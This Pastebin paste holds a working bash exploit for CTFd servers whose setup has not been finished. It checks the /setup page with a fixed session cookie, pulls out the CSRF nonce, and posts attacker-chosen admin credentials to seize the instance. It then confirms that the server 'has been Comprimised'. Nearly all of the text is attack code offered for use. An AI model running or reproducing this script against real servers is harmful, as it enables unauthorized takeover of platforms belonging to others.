Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- clear
- read -p "Enter Target Address Followed by Port: " target port # localhost 8080
- if [ $port -lt 65536 ] && [ $port -gt 0 ]; then
- curl --silent -H 'Cookie: session=00000000-0000-0000-0000-000000000000' -b 'session=00000000-0000-0000-0000-000000000000' $target:$port/setup > preexp #Downloaded to check <title>, <h1> and nonce values.
- else
- echo "Incorrect Port."
- fi
- titleCheck=$(grep '<title>CTFd</title>' preexp) #If server is not configured, default <title> value is 'CTFd' until admin changes
- headerOneCheck=$(grep '<h1>Setup</h1>' preexp) #Due to the possibility of admin naming server to 'CTFd', a check for <h1> value 'Setup' is made to double check.
- nonce=$(grep 'var csrf_nonce' preexp | awk '{print $4}' | sed 's/.//;s/..$//') #This nonce will include cookie value of 'session=00000000-0000-0000-0000-000000000000' so don't worry;)
- rm preexp
- if [ $titleCheck = "<title>CTFd</title>" ] && [ $headerOneCheck = "<h1>Setup</h1>" ]; then
- read -p "Target is Vulnerable, Would you Like to Attack? (Y/n): " attack
- if [ "$attack" = 'y' ] || [ "$attack" = 'Y' ]; then
- clear
- read -p 'CTF Name: ' ctfName #Name for the CTF
- read -p 'Admin Username: ' adminName #Username for the administration account
- read -p 'Admin Email: ' adminEmail #Email address for the administration account
- read -p 'Admin Password: ' adminPassword #Password for the administration account
- read -p 'User Mode (teams/users): ' userMode #Dictates whether users join teams to play (Team Mode) or play as themselves (User Mode)
- clear
- echo Working on it...
- curl --silent -i -X POST -H 'Cookie: session=00000000-0000-0000-0000-000000000000' -b 'session=00000000-0000-0000-0000-000000000000' --data 'nonce='$nonce'&ctf_name='$ctfName'&name='$adminName'&email='$adminEmail'&password='$adminPassword'&user_mode='$userMode'' http://$target:$port/setup #Send previously entered values to $target
- clear
- echo Attack Executed!
- curl --silent -H 'Cookie: session=00000000-0000-0000-0000-000000000000' -b 'session=00000000-0000-0000-0000-000000000000' $target:$port/setup > postexp #Verify successful exploit
- titleCheck=$(grep '<title>CTFd</title>' postexp)
- headerOneCheck=$(grep '<h1>Setup</h1>' postexp)
- rm postexp
- if [ $titleCheck = "<title>CTFd</title>" ] && [ $headerOneCheck = "<h1>Setup</h1>" ]; then #Values should be diffrent from what we started with pre-setup
- clear
- echo Something went Wrong, Try Again.
- else
- clear
- echo 'CTFd Server Hosted @ '$target' has been Comprimised:)'
- fi
- fi
- else
- echo Something went Wrong, Try Again.
- fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement